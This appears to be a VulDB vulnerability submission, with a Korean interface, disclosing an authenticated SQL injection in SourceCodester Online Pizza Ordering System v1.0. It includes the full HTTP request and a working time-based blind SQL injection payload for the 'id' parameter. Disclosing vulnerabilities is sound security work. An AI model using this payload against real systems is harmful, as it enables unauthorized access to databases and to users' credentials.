| 제목 | SourceCodester Online Pizza Ordering System SQL Injection via 'confirm_order' |
|---|
| 설명 | Affected Software:
SourceCodester Online Pizza Ordering System v1.0
https://www.sourcecodester.com/php/16166/online-pizza-ordering-system-php-free-source-code.html#comment-103391
Tested On:
Ubuntu Server 22.04.3 LTS
Affected URL:
http://x.x.x.x/php-opos/admin/ajax.php?action=confirm_order
Request:
POST /php-opos/admin/ajax.php?action=confirm_order HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 5
Origin: http://x.x.x.x
Connection: close
Referer: http://x.x.x.x/php-opos/admin/index.php?page=orders
Cookie: PHPSESSID=xxxxxxxxxxxxxxxxx
id=1
Affected Parameter:
id
Proof of Concept:
POST /php-opos/admin/ajax.php?action=confirm_order HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 5
Origin: http://x.x.x.x
Connection: close
Referer: http://x.x.x.x/php-opos/admin/index.php?page=orders
Cookie: PHPSESSID=xxxxxxxxxxxxxxxxx
id=1 AND (SELECT 5605 FROM (SELECT(SLEEP(15)))UTXE)
Impact:
SQL injection vulnerability can result in unauthorized access to restricted data such as user information and credentials.
Summary:
An authenticated remote SQL injection vulnerability exists in the SourceCodester Online Pizza Ordering System v1.0. The vulnerability is present in a POST request to the /admin/ajax.php?action=confirm_order page via the 'view order' functionality in /admin/index.php?page=orders. Due to improper input sanitization, a specially crafted packet that manipulates the 'id' parameter in the POST request leads to an SQL injection vulnerability, allowing malicious actors to view restricted data and extract the underlying database.
|
|---|
| 사용자 | simon.davis8080 (UID 54983) |
|---|
| 제출 | 2023. 10. 05. AM 10:30 (3 연령 ago) |
|---|
| 모더레이션 | 2023. 10. 05. PM 12:01 (2 hours later) |
|---|
| 상태 | 수락 |
|---|
| VulDB 항목 | 241384 [SourceCodester Online Pizza Ordering System 1.0 ajax.php?action=confirm_order 아이디 SQL 주입] |
|---|
| 포인트들 | 17 |
|---|